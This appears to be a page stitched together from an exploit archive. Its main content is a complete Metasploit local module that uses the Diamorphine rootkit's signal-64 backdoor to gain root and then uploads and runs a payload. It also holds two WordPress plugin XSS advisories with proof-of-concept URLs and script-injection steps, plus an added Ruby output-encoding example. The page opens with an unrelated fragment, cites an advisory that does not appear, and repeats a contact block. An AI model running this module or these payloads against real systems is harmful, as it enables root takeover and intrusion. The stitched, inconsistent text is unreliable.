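The containment check compares against `root + File::SEPARATOR`, not `root` alone, so a sibling directory such as `/var/mail/spool2` is not mistaken for something inside `/var/mail/spool`. If the spool root can itself contain symlinks, resolve it with `File.realpath` before the comparison.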


This Metasploit module uses Diamorphine rootkit's privesc feature using signal 64 to elevate the privileges of arbitrary processes to UID 0 (root). This module has been tested successfully with Diamorphine from master branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).

MD5 | 0f5d26726fb0bdde38edd5ddbc676005

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Diamorphine Rootkit Signal Privilege Escalation',
      'Description' => %q{
        This module uses Diamorphine rootkit's privesc feature using signal
        64 to elevate the privileges of arbitrary processes to UID 0 (root).

        This module has been tested successfully with Diamorphine from `master`
        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'm0nad', # Diamorphine
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2013-11-07', # Diamorphine first public commit
      'References' =>
        [
          ['URL', 'https://github.com/m0nad/Diamorphine']
        ],
      'Platform' => ['linux'],
      'Arch' => [ARCH_X86, ARCH_X64],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Targets' => [['Auto', {}]],
      'Notes' =>
        {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        },
      'DefaultTarget' => 0))
    register_options [
      OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def signal
    datastore['SIGNAL'].to_s
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload_and_chmodx(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    write_file path, data
    chmod path, 0755
  end

  def cmd_exec_elevated(cmd)
    vprint_status "Executing #{cmd} ..."
    res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s
    vprint_line res unless res.blank?
    res
  end

  def check
    res = cmd_exec_elevated 'id'

    if res.include?('invalid signal')
      return CheckCode::Safe("Signal '#{signal}' is invalid")
    end

    unless res.include?('uid=0')
      return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")
    end

    CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 8..12}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe
    register_file_for_cleanup payload_path

    cmd_exec_elevated "#{payload_path} & echo "
  end
end


WordPress Yikes Inc Easy Mailchimp Extender plugin version 6.6.2 suffers from a cross site scripting vulnerability.

MD5 | c423a749c8f7efb16888e9b98084bd3a

[-] Title : WordPress plugin yikes-inc-easy-mailchimp-extender 6.6.2 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
==============================================================================================
Vulnerable Source:
2: $form_data['field_name'] = $_POST['field_name']
36: echo echo $form_data['field_name'];
50: echo echo $form_data['field_type'];
===============================================================================================
POC :
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

step 1 = Go To Web Page =
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

Step 2 = In the boxes "field_name" and "field_type"

Step 3 = enter the JavaScript code: alert('XSS')
===============================================================================================
************************
* ==> Contact us:
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************


WordPress WPForms-Lite plugin version 1.5.8.2 suffers from a cross site scripting vulnerability.

MD5 | 944ecdb044dbe08019b3254c5ca78a02

[-] Title : WordPress plugin wpforms-lite 1.5.8.2 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Software Link : https://wordpress.org/plugins/wpforms-lite/
[-] Version: [ 1.5.8.2 ]
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable page :
wpforms-lite/includes/providers/class-base.php
===============================================================================================
Vulnerable Source :
1071 : echo echo absint($_GET['form_id']);
================================================================================================
POC :
http://localhost/wp-content/plugins/wpforms-lite/includes/providers/class-base.php?form_id=[XSS]
================================================================================================
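The XSS advisories on this page (Online Birth Certificate System, the Yikes Mailchimp extender and WPForms-Lite) share one root cause: a request parameter is echoed into HTML without output encoding for the context it lands in. The Ruby below is an added example, not code from any of those projects or from WordPress; the helper names, the rendering snippet and the sample payload are constructed for illustration. It shows the raw echo beside three context-specific encoders, since what is safe in element text is not safe in an attribute or inside a script block.

```ruby
require 'cgi'
require 'json'

# Element-text context: escape the characters that can open markup or an entity.
def html_text(value)
  CGI.escapeHTML(value.to_s)
end

# Attribute context: escape as above and always emit the surrounding quotes,
# so a value cannot end the attribute and start an event handler.
def html_attr(value)
  "\"#{CGI.escapeHTML(value.to_s)}\""
end

# JavaScript string context: a JSON string literal handles quotes and
# backslashes; '<' and '>' are additionally escaped so that a "</script>"
# inside the value cannot terminate the enclosing script element.
def js_string(value)
  value.to_s.to_json.gsub('<') { '\u003c' }.gsub('>') { '\u003e' }
end

# Vulnerable pattern from the advisories: the stored value is echoed raw
# (the PHP equivalent of echo $_POST['field_name']).
def render_unsafe(field)
  "<td>#{field}</td>"
end

def render_safe(field)
  "<td>#{html_text(field)}</td>"
end

# Constructed payload, modelled on the alert() probes in the advisories.
PAYLOAD = "<script>alert('document.cookie')</script>".freeze

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(PAYLOAD)
  puts render_safe(PAYLOAD)
  puts "<input name=\"place_of_birth\" value=#{html_attr('x" onmouseover="alert(1)')}>"
  puts "<script>var fieldName = #{js_string('</script><script>alert(1)')};</script>"
end
```

Encoding happens at output time, per context, not at storage time: the same stored string may be written into a table cell, an attribute and a script on different pages, and a single input-side filter cannot be right for all three.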
************************
* ==> Contact us:
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************
